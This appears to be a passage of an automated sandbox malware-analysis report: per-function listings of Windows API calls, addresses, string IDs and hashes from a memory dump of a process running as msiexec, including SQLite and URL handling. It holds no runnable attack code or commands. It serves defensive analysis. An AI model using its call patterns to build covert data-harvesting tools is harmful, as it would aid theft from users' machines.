                                                                                                                                                      • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                      APIs
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                                                                      • memset.MSVCRT ref: 0040AF18
                                                                                                                                                      • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1865533344-0
                                                                                                                                                      • Opcode ID: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                                                                                                      • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                                      • Opcode Fuzzy Hash: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                                                                                                      • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 004144E7
                                                                                                                                                        • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                        • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                      • memset.MSVCRT ref: 0041451A
                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1127616056-0
                                                                                                                                                      • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                      • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                      • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                      • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                      APIs
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                                                                      • memset.MSVCRT ref: 0042FED3
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                      • String ID: sqlite_master
                                                                                                                                                      • API String ID: 438689982-3163232059
                                                                                                                                                      • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                      • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                                      • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                      • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                                      APIs
                                                                                                                                                      • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                      • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3917621476-0
                                                                                                                                                      • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                      • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                                                      • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                      • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                      • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                      • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                      • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                      • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 822687973-0
                                                                                                                                                      • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                      • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                                                      • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                      • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                                                      APIs
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                      • malloc.MSVCRT ref: 00417459
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                                                                                                                                      • free.MSVCRT ref: 0041747F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2605342592-0
                                                                                                                                                      • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                                                      • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                      • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                                                      • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                      • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                      • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2678498856-0
                                                                                                                                                      • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                      • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                      • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                      • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$Item
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3888421826-0
                                                                                                                                                      • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                      • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                      • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                      • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00417B7B
                                                                                                                                                      • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                      • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3727323765-0
                                                                                                                                                      • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                      • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                      • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                      • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040F673
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                      • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                      • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                      • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                      • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                      • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                      • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                      • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                      • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                      • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                      • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00402FD7
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                      • strlen.MSVCRT ref: 00403006
                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                      • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                      • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                                      • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                      • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: wcscpy$CloseHandle
                                                                                                                                                      • String ID: General
                                                                                                                                                      • API String ID: 3722638380-26480598
                                                                                                                                                      • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                      • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                      • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                      • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                        • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                        • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                      • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                      • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 764393265-0
                                                                                                                                                      • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                      • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                      • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                      • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                      APIs
                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$System$File$LocalSpecific
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 979780441-0
                                                                                                                                                      • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                      • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                      • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                      • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                      APIs
                                                                                                                                                      • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                                      • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                      • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1386444988-0
                                                                                                                                                      • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                      • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                      • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                      • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??3@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                      • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                      • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                      • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                      • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                      APIs
                                                                                                                                                      • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InvalidateMessageRectSend
                                                                                                                                                      • String ID: d=E
                                                                                                                                                      • API String ID: 909852535-3703654223
                                                                                                                                                      • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                      • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                                                      • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                      • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                                                      APIs
                                                                                                                                                      • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                      • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                        • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                        • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: wcschr$memcpywcslen
                                                                                                                                                      • String ID: "
                                                                                                                                                      • API String ID: 1983396471-123907689
                                                                                                                                                      • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                      • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                      • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                      • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                      • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                      • String ID: URL
                                                                                                                                                      • API String ID: 2108176848-3574463123
                                                                                                                                                      • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                      • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                                      • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                      • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                                      APIs
                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _snwprintfmemcpy
                                                                                                                                                      • String ID: %2.2X
                                                                                                                                                      • API String ID: 2789212964-323797159
                                                                                                                                                      • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                      • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
